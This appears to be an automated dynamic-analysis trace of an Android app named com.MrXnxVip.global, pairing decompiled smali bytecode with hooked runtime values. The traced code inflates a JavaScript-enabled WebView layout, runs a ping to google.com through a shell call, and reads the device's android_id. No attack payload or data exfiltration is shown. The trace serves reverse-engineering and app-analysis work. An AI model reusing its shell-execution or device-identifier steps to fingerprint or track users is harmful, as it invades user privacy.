                        50sget-object v2, Ljava/lang/Integer;->TYPE:Ljava/lang/Class;
                        51const/4 v9, 0x6
                        52aput-object v2, v1, v9
                        54sget-object v2, Ljava/lang/Float;->TYPE:Ljava/lang/Class;
                        55const/4 v10, 0x7
                        56aput-object v2, v1, v10
                        57move-object v2, p0
                        58move-object v11, p1
                        60invoke-virtual {p0, p1, v1}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 693315
                          • This:
                            • class com.MrXnxVip.global.designerscripts.LS_layout
                            • getName:com.MrXnxVip.global.designerscripts.LS_layout
                          • p0: LS_general
                          • p1: [Ljava.lang.Class;@420ba74
                          • p1.Arrays.toString: [class anywheresoftware.b4a.BA, class android.view.View, class anywheresoftware.b4a.keywords.LayoutValues, interface java.util.Map, interface java.util.Map, int, int, float]
                          • Return:
                            • public static void com.MrXnxVip.global.designerscripts.LS_layout.LS_general(anywheresoftware.b4a.BA,android.view.View,anywheresoftware.b4a.keywords.LayoutValues,java.util.Map,java.util.Map,int,int,float) throws java.lang.Exception
                            • getName: LS_general
                        61move-result-object v1
                        62new-array v0, v0, [Ljava/lang/Object;
                        63aput-object p3, v0, v3
                        64aput-object p4, v0, v4
                        65aput-object p2, v0, v5
                        66aput-object p6, v0, v6
                        67aput-object p5, v0, v7
                        69invoke-static/range {p7 .. p7}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        70move-result-object v2
                        71aput-object v2, v0, v8
                        73invoke-static/range {p8 .. p8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        74move-result-object v2
                        75aput-object v2, v0, v9
                        77invoke-static/range {p9 .. p9}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        78move-result-object v2
                        79aput-object v2, v0, v10
                        80const/4 v2, 0x0
                        82invoke-virtual {v1, v2, v0}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Reflective invoke: com.MrXnxVip.global.designerscripts.LS_layout.LS_general
                          • p0: anywheresoftware.b4a.BA@5b92be3
                          • p1: anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ......ID 0
                          • p2: 0-441
                          • p3: 597 #1}
                          • p4: 320 x 480
                          • p5: scale = 1.0 (160 dpi)
                          • p6: {parent=
                          • p7: drawable={color=-984833
                          • p8: csType=Dbasic.Designer.Drawable.ColorDrawable
                          • p9: type=.drawable.ColorDrawable}
                          • p10: visible=true
                          • p11: :kids={0={padding=null
                          • p12: parent=Activity
                          • p13: visible=true
                          • p14: csType=Dbasic.Designer.MetaWebView
                          • p15: zoomEnabled=false
                          • p16: vanchor=0
                          • p17: type=.WebViewWrapper
                          • p18: enabled=true
                          • p19: variant0={top=0
                          • p20: left=0
                          • p21: hanchor=0
                          • p22: width=320
                          • p23: vanchor=0
                          • p24: height=430}
                          • p25: javaType=.WebViewWrapper
                          • p26: top=0
                          • p27: left=0
                          • p28: hanchor=0
                          • p29: name=WebView1
                          • p30: width=320
                          • p31: eventName=WebView1
                          • p32: javaScriptEnabled=true
                          • p33: tag=
                          • p34: height=430}}
                          • p35: csType=Dbasic.Designer.MetaActivity
                          • p36: type=.ActivityWrapper
                          • p37: title=Activity
                          • p38: variant0={top=100
                          • p39: left=100
                          • p40: hanchor=0
                          • p41: width=100
                          • p42: vanchor=0
                          • p43: height=100}
                          • p44: fullScreen=false
                          • p45: javaType=.ActivityWrapper
                          • p46: animationDuration=400
                          • p47: titleColor=-984833
                          • p48: top=100
                          • p49: left=100
                          • p50: name=Activity
                          • p51: width=100
                          • p52: eventName=Activity
                          • p53: includeTitle=false
                          • p54: tag=
                          • p55: height=100}
                          • p56: {webview1=anywheresoftware.b4a.keywords.LayoutBuilder$ViewWrapperAndAnchor@fc909e0}
                          • p57: 441
                          • p58: 597
                          • p59: 1.3312501
                          • Return:
                            • null
                        • Time: 693326
                          • This:
                            • public static void com.MrXnxVip.global.designerscripts.LS_layout.LS_general(anywheresoftware.b4a.BA,android.view.View,anywheresoftware.b4a.keywords.LayoutValues,java.util.Map,java.util.Map,int,int,float) throws java.lang.Exception
                            • getName:LS_general
                          • p0: null
                          • p1: [Ljava.lang.Object;@ada5812
                          • p1.Arrays.toString: [anywheresoftware.b4a.BA@5b92be3, anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ......ID 0,0-441,597 #1}, 320 x 480, scale = 1.0 (160 dpi), {parent=, drawable={color=-984833, csType=Dbasic.Designer.Drawable.ColorDrawable, type=.drawable.ColorDrawable}, visible=true, :kids={0={padding=null, parent=Activity, visible=true, csType=Dbasic.Designer.MetaWebView, zoomEnabled=false, vanchor=0, type=.WebViewWrapper, enabled=true, variant0={top=0, left=0, hanchor=0, width=320, vanchor=0, height=430}, javaType=.WebViewWrapper, top=0, left=0, hanchor=0, name=WebView1, width=320, eventName=WebView1, javaScriptEnabled=true, tag=, height=430}}, csType=Dbasic.Designer.MetaActivity, type=.ActivityWrapper, title=Activity, variant0={top=100, left=100, hanchor=0, width=100, vanchor=0, height=100}, fullScreen=false, javaType=.ActivityWrapper, animationDuration=400, titleColor=-984833, top=100, left=100, name=Activity, width=100, eventName=Activity, includeTitle=false, tag=, height=100}, {webview1=anywheresoftware.b4a.keywords.La
                          • Return:
                            • null
                        83return-void
                        Cross References
                        APIs
                        Strings
                        • --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                        • 64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=2 ttl=105 time=150 ms
                        • PING google.com (142.251.2.139) 56(84) bytes of data.64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=1 ttl=105 time=149 ms
                        • UTF8
                        • ping -c 2 -W 10 -v google.com
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5new-instance v0, Lanywheresoftware/b4a/phone/Phone;
                        7invoke-direct {v0}, Lanywheresoftware/b4a/phone/Phone;-><init>()V
                        8new-instance v0, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;
                        10invoke-direct {v0}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;-><init>()V
                        12invoke-virtual {v0}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->Initialize()V
                        14sget-object v1, Lanywheresoftware/b4a/keywords/Common;->Null:Ljava/lang/Object;
                        15check-cast v1, [Ljava/lang/String;
                        17invoke-virtual {v0}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->getObject()Ljava/lang/Object;
                        18move-result-object v2
                        19check-cast v2, Ljava/lang/StringBuilder;
                        21sget-object v3, Lanywheresoftware/b4a/keywords/Common;->Null:Ljava/lang/Object;
                        22check-cast v3, Ljava/lang/StringBuilder;
                        24const-string v4, "ping -c 2 -W 10 -v google.com"
                        26invoke-static {v4, v1, v2, v3}, Lanywheresoftware/b4a/phone/Phone;->Shell(Ljava/lang/String;[Ljava/lang/String;Ljava/lang/StringBuilder;Ljava/lang/StringBuilder;)I
                        • Time: 693376
                          • This:
                            • java.lang.Runtime@d64e9c2
                          • p0: ping -c 2 -W 10 -v google.com
                          • Return:
                            • Process[pid=1397, hasExited=false]
                        • Time: 693929
                          • This:
                            • PING google.com (142.251.2.139) 56(84) bytes of data.64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=1 ttl=105 time=149 ms
                          • p0: [B@9be00e
                          • p0: --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                          • p0: 0A2D2D2D20676F6F676C652E636F6D2070696E672073746174697374696373202D2D2D0A32207061636B657473207472616E736D69747465642C20322072656365697665642C203025207061636B6574206C6F73732C2074696D6520313030306D730A727474206D696E2F6176672F6D61782F6D646576203D203134392E3835382F3135302E3232322F3135302E3538362F302E333634206D730A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                          • p1: 0
                          • p2: 137
                          • p3: SHA-1
                          • Return:
                            • PING google.com (142.251.2.139) 56(84) bytes of data.64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=1 ttl=105 time=149 ms
                        • Time: 694861
                          • This:
                            • 64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=2 ttl=105 time=150 ms
                          • p0: [B@9be00e
                          • p0: --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                          • p0: 0A2D2D2D20676F6F676C652E636F6D2070696E672073746174697374696373202D2D2D0A32207061636B657473207472616E736D69747465642C20322072656365697665642C203025207061636B6574206C6F73732C2074696D6520313030306D730A727474206D696E2F6176672F6D61782F6D646576203D203134392E3835382F3135302E3232322F3135302E3538362F302E333634206D730A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                          • p1: 0
                          • p2: 83
                          • p3: SHA-1
                          • Return:
                            • 64 bytes from dl-in-f139.1e100.net (142.251.2.139): icmp_seq=2 ttl=105 time=150 ms
                        • Time: 694976
                          • This:
                            • --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                          • p0: [B@9be00e
                          • p0: --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                          • p0: 0A2D2D2D20676F6F676C652E636F6D2070696E672073746174697374696373202D2D2D0A32207061636B657473207472616E736D69747465642C20322072656365697665642C203025207061636B6574206C6F73732C2074696D6520313030306D730A727474206D696E2F6176672F6D61782F6D646576203D203134392E3835382F3135302E3232322F3135302E3538362F302E333634206D730A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                          • p1: 0
                          • p2: 155
                          • p3: SHA-1
                          • Return:
                            • --- google.com ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 149.858/150.222/150.586/0.364 ms
                        28invoke-virtual {v0}, Lanywheresoftware/b4a/keywords/StringBuilderWrapper;->getLength()I
                        29move-result v0
                        30if-nez v0, :cond_28
                        31const/4 v0, 0x0
                        32return v0
                        33cond_28: const/4 v0, 0x1
                        34return v0
                        Cross References
                        APIs
                        • android.app.Application.getContentResolver
                        • android.provider.Settings$Secure.getString
                        • java.lang.Exception.printStackTrace
                        • java.lang.String.length
                        Strings
                        • android_id
                        • d3ccba0fb60b1a86
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/reza/sh/deviceinfo/DiviceInfo;->initialVal:Ljava/lang/String;
                        2try_start_2:
                        3sget-object v1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        5invoke-virtual {v1}, Landroid/app/Application;->getContentResolver()Landroid/content/ContentResolver;
                        6move-result-object v1
                        8const-string v2, "android_id"
                        10invoke-static {v1, v2}, Landroid/provider/Settings$Secure;->getString(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;
                        • Time: 690134
                          • p0: android.app.ContextImpl$ApplicationContentResolver@6c30d5e
                          • p1: android_id
                          • Return:
                            • d3ccba0fb60b1a86
                        11move-result-object v0
                        12try_end_e: goto/16 :goto_13
                        13catch_f: move-exception v1
                        15invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
                        16goto_13: if-eqz v0, :cond_1b
                        18invoke-virtual {v0}, Ljava/lang/String;->length()I
                        19move-result v1
                        20if-nez v1, :cond_1d
                        21cond_1b:
                        22iget-object v0, p0, Lcom/reza/sh/deviceinfo/DiviceInfo;->initialVal:Ljava/lang/String;
                        23cond_1d: return-object v0
                        Cross References
                        APIs
                        • java.util.HashMap.get
                        • java.util.HashMap.get
                        • android.view.ViewGroup.setBackgroundDrawable
                        • java.util.HashMap.get
                        • java.util.HashMap.put
                        • java.util.HashMap.get
                        • java.util.HashMap.put
                        • java.util.HashMap.get
                        • java.util.HashMap.put
                        • java.util.HashMap.get
                        • java.util.HashMap.put
                        • android.view.ViewGroup.getContext
                        • java.util.HashMap.get
                        • java.lang.String.toLowerCase
                        • java.util.HashMap.get
                        • java.lang.String.startsWith
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.newInstance
                        • java.util.HashMap.containsKey
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • java.util.HashMap.put
                        • java.util.HashMap.<init>
                        • java.lang.Class.forName
                        • java.lang.Class.getDeclaredFields
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.HashMap.get
                        • java.util.ArrayList.<init>
                        • java.util.List.add
                        • java.util.HashMap.get
                        • java.lang.String.length
                        • java.lang.Class.forName
                        • java.lang.String.lastIndexOf
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.String.substring
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.newInstance
                        • java.util.HashMap.<init>
                        • java.lang.RuntimeException.<init>
                        • java.lang.reflect.Field.getType
                        • java.lang.Object.getClass
                        • java.lang.Object.getClass
                        • java.lang.Class.getGenericSuperclass
                        • java.lang.reflect.ParameterizedType.getActualTypeArguments
                        • java.lang.reflect.Field.getType
                        • java.lang.Class.getGenericSuperclass
                        • java.lang.reflect.ParameterizedType.getActualTypeArguments
                        • java.lang.reflect.ParameterizedType.getActualTypeArguments
                        • java.lang.Class.isAssignableFrom
                        • java.lang.StringBuilder.<init>
                        • java.lang.Object.getClass
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.reflect.Field.getType
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • java.lang.reflect.Field.getType
                        • java.lang.Class.newInstance
                        • java.util.HashMap.<init>
                        • java.util.HashMap.put
                        • java.lang.reflect.Field.set
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • java.util.HashMap.get
                        • java.lang.String.toLowerCase
                        • android.view.View.getLayoutParams
                        • android.view.ViewGroup.addView
                        • java.lang.reflect.Field.getName
                        • java.lang.String.startsWith
                        • java.lang.reflect.Field.getName
                        • java.util.HashMap.put
                        • java.util.HashMap.get
                        • android.view.View.getLayoutParams
                        • android.view.View.getLayoutParams
                        • android.view.View.getLayoutParams
                        • android.view.View.getLayoutParams
                        • java.util.HashMap.size
                        • java.lang.String.valueOf
                        • java.util.HashMap.get
                        Strings
                        • drawable
                        • left
                        • top
                        • width
                        • height
                        • name
                        • type
                        • .
                        • anywheresoftware.b4a.objects
                        • anywheresoftware.b4a.objects.WebViewWrapper
                        • hanchor
                        • vanchor
                        • _
                        • com.MrXnxVip.global.main
                        • customType
                        • CustomView CustomType property was not set.
                        • java.lang.String@def084f
                        • java.lang.String@f68cbdc
                        • Cannot convert:
                        • , to:
                        • Field
                        • was declared with the wrong type.
                        • eventName
                        • :kids
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/util/HashMap<",
                        4"Ljava/lang/String;",
                        5"Ljava/lang/Object;",
                        6">;",
                        7"Lanywheresoftware/b4a/BA;",
                        8"Ljava/lang/Object;",
                        9"Landroid/view/ViewGroup;",
                        10"Z",
                        11"Ljava/lang/String;",
                        12"Z",
                        13"Ljava/util/HashMap<",
                        14"Ljava/lang/String;",
                        15"Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;",
                        16">;II)V"
                        17}
                        18.end annotation
                        19.annotation system Ldalvik/annotation/Throws;
                        20value = {
                        21Ljava/lang/Exception;
                        22}
                        23.end annotation
                        24move-object/from16 v1, p0
                        25move-object/from16 v11, p1
                        26move-object/from16 v2, p3
                        27move/from16 v3, p8
                        28move-object/from16 v12, p5
                        29move/from16 v4, p9
                        31invoke-virtual {v1, v12}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        32move-result-object v0
                        33check-cast v0, Ljava/util/HashMap;
                        34const/4 v5, 0x0
                        35const/4 v6, 0x0
                        36if-nez p4, :cond_2f
                        37if-nez p6, :cond_19
                        38goto/16 :goto_2f
                        39cond_19:
                        40const-string v0, "drawable"
                        42invoke-virtual {v1, v0}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        43move-result-object v0
                        44check-cast v0, Ljava/util/HashMap;
                        46invoke-static {v2, v0, v6, v5}, Lanywheresoftware/b4a/DynamicBuilder;->build(Ljava/lang/Object;Ljava/util/HashMap;ZLjava/lang/Object;)Ljava/lang/Object;
                        47move-result-object v0
                        48check-cast v0, Landroid/graphics/drawable/Drawable;
                        50invoke-virtual {v2, v0}, Landroid/view/ViewGroup;->setBackgroundDrawable(Landroid/graphics/drawable/Drawable;)V
                        51move-object/from16 v14, p7
                        52move-object v0, v2
                        53goto/16 :goto_272
                        54goto_2f: if-eqz p4, :cond_33
                        55move-object v7, v2
                        56goto/16 :goto_34
                        57cond_33: move-object v7, v5
                        58goto_34:
                        59const-string v8, "left"
                        61invoke-virtual {v0, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        62move-result-object v9
                        64invoke-virtual {v1, v8, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        66const-string v8, "top"
                        68invoke-virtual {v0, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        69move-result-object v9
                        71invoke-virtual {v1, v8, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        73const-string v8, "width"
                        75invoke-virtual {v0, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        76move-result-object v9
                        78invoke-virtual {v1, v8, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        80const-string v8, "height"
                        82invoke-virtual {v0, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        83move-result-object v9
                        85invoke-virtual {v1, v8, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        87invoke-virtual/range {p3 .. p3}, Landroid/view/ViewGroup;->getContext()Landroid/content/Context;
                        88move-result-object v8
                        90invoke-static {v7, v1, v6, v8}, Lanywheresoftware/b4a/DynamicBuilder;->build(Ljava/lang/Object;Ljava/util/HashMap;ZLjava/lang/Object;)Ljava/lang/Object;
                        91move-result-object v7
                        92check-cast v7, Landroid/view/View;
                        93if-nez p4, :cond_26f
                        95const-string v8, "name"
                        97invoke-virtual {v1, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        98move-result-object v8
                        99check-cast v8, Ljava/lang/String;
                        101sget-object v9, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        103invoke-virtual {v8, v9}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        104move-result-object v8
                        106const-string v9, "type"
                        108invoke-virtual {v1, v9}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        109move-result-object v9
                        110check-cast v9, Ljava/lang/String;
                        112const-string v10, "."
                        114invoke-virtual {v9, v10}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
                        115move-result v13
                        116if-eqz v13, :cond_90
                        117new-instance v13, Ljava/lang/StringBuilder;
                        119const-string v14, "anywheresoftware.b4a.objects"
                        121invoke-direct {v13, v14}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        123invoke-virtual {v13, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        125invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        126move-result-object v9
                        127cond_90:
                        128invoke-static {v9}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 693159
                          • p0: anywheresoftware.b4a.objects.WebViewWrapper
                          • Return:
                            • class anywheresoftware.b4a.objects.WebViewWrapper
                            • getName: anywheresoftware.b4a.objects.WebViewWrapper
                        129move-result-object v9
                        131invoke-virtual {v9}, Ljava/lang/Class;->newInstance()Ljava/lang/Object;
                        132move-result-object v9
                        133check-cast v9, Lanywheresoftware/b4a/objects/ViewWrapper;
                        134new-instance v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;
                        135if-eqz p4, :cond_9f
                        136goto/16 :goto_a0
                        137cond_9f: move-object v5, v2
                        138goto_a0:
                        139invoke-direct {v13, v9, v5}, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;-><init>(Lanywheresoftware/b4a/objects/ViewWrapper;Landroid/view/View;)V
                        141const-string v5, "hanchor"
                        143invoke-virtual {v0, v5}, Ljava/util/HashMap;->containsKey(Ljava/lang/Object;)Z
                        144move-result v14
                        145if-eqz v14, :cond_c5
                        147invoke-virtual {v0, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        148move-result-object v5
                        149check-cast v5, Ljava/lang/Integer;
                        151invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        152move-result v5
                        153iput v5, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->hanchor:I
                        155const-string v5, "vanchor"
                        157invoke-virtual {v0, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        158move-result-object v0
                        159check-cast v0, Ljava/lang/Integer;
                        161invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        162move-result v0
                        163iput v0, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->vanchor:I
                        164cond_c5: iput v3, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->pw:I
                        165iput v4, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->ph:I
                        166move-object/from16 v14, p7
                        168invoke-virtual {v14, v8, v13}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        170sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->classFields:Ljava/util/HashMap;
                        172const-string v5, "_"
                        173if-eqz v0, :cond_da
                        175sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->currentClass:Ljava/lang/String;
                        177iget-object v15, v11, Lanywheresoftware/b4a/BA;->className:Ljava/lang/String;
                        178if-eq v0, v15, :cond_f2
                        179cond_da: new-instance v0, Ljava/util/HashMap;
                        181invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        182sput-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->classFields:Ljava/util/HashMap;
                        184iget-object v0, v11, Lanywheresoftware/b4a/BA;->className:Ljava/lang/String;
                        185sput-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->currentClass:Ljava/lang/String;
                        187iget-object v0, v11, Lanywheresoftware/b4a/BA;->className:Ljava/lang/String;
                        189invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 693160
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        190move-result-object v0
                        192invoke-virtual {v0}, Ljava/lang/Class;->getDeclaredFields()[Ljava/lang/reflect/Field;
                        193move-result-object v0
                        194array-length v15, v0
                        195goto_f0: if-lt v6, v15, :cond_24e
                        196cond_f2:
                        197sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->classFields:Ljava/util/HashMap;
                        198new-instance v6, Ljava/lang/StringBuilder;
                        200invoke-direct {v6, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        202invoke-virtual {v6, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        204invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        205move-result-object v5
                        207invoke-virtual {v0, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        208move-result-object v0
                        209move-object v5, v0
                        210check-cast v5, Ljava/lang/reflect/Field;
                        211instance-of v0, v9, Lanywheresoftware/b4a/objects/CustomViewWrapper;
                        212if-eqz v0, :cond_171
                        214sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        215if-nez v0, :cond_116
                        216new-instance v0, Ljava/util/ArrayList;
                        218invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        219sput-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        220cond_116:
                        221sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->customViewWrappers:Ljava/util/List;
                        222move-object v6, v9
                        223check-cast v6, Lanywheresoftware/b4a/objects/CustomViewWrapper;
                        225invoke-interface {v0, v6}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        227const-string v0, "customType"
                        229invoke-virtual {v1, v0}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        230move-result-object v0
                        231move-object v15, v0
                        232check-cast v15, Ljava/lang/String;
                        233if-eqz v15, :cond_169
                        235invoke-virtual {v15}, Ljava/lang/String;->length()I
                        236move-result v0
                        237if-eqz v0, :cond_169
                        238try_start_12f:
                        239invoke-static {v15}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        240move-result-object v0
                        241try_end_133: goto/16 :goto_158
                        242catch_134: move-exception v0
                        243move-object/from16 v17, v0
                        245invoke-virtual {v15, v10}, Ljava/lang/String;->lastIndexOf(Ljava/lang/String;)I
                        246move-result v0
                        247const/4 v10, -0x1
                        248if-le v0, v10, :cond_168
                        249new-instance v10, Ljava/lang/StringBuilder;
                        251sget-object v17, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        253invoke-static/range {v17 .. v17}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        254move-result-object v12
                        256invoke-direct {v10, v12}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        258invoke-virtual {v15, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;
                        259move-result-object v0
                        261invoke-virtual {v10, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        263invoke-virtual {v10}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        264move-result-object v0
                        266invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        267move-result-object v0
                        268goto_158:
                        269invoke-virtual {v0}, Ljava/lang/Class;->newInstance()Ljava/lang/Object;
                        270move-result-object v0
                        271iput-object v0, v6, Lanywheresoftware/b4a/objects/CustomViewWrapper;->customObject:Ljava/lang/Object;
                        272new-instance v10, Ljava/util/HashMap;
                        274invoke-direct {v10, v1}, Ljava/util/HashMap;-><init>(Ljava/util/Map;)V
                        275iput-object v10, v6, Lanywheresoftware/b4a/objects/CustomViewWrapper;->props:Ljava/util/HashMap;
                        276const/4 v12, 0x0
                        277goto/16 :goto_1ed
                        278cond_168: throw v17
                        279cond_169: new-instance v0, Ljava/lang/RuntimeException;
                        281const-string v1, "CustomView CustomType property was not set."
                        283invoke-direct {v0, v1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        284throw v0
                        285cond_171: if-eqz v5, :cond_1eb
                        287invoke-virtual {v5}, Ljava/lang/reflect/Field;->getType()Ljava/lang/Class;
                        288move-result-object v0
                        290invoke-virtual {v9}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 693161
                          • This:
                            • (WebView) Not initialized
                          • This:
                            • (WebView) Not initialized
                          • Return:
                            • class anywheresoftware.b4a.objects.WebViewWrapper
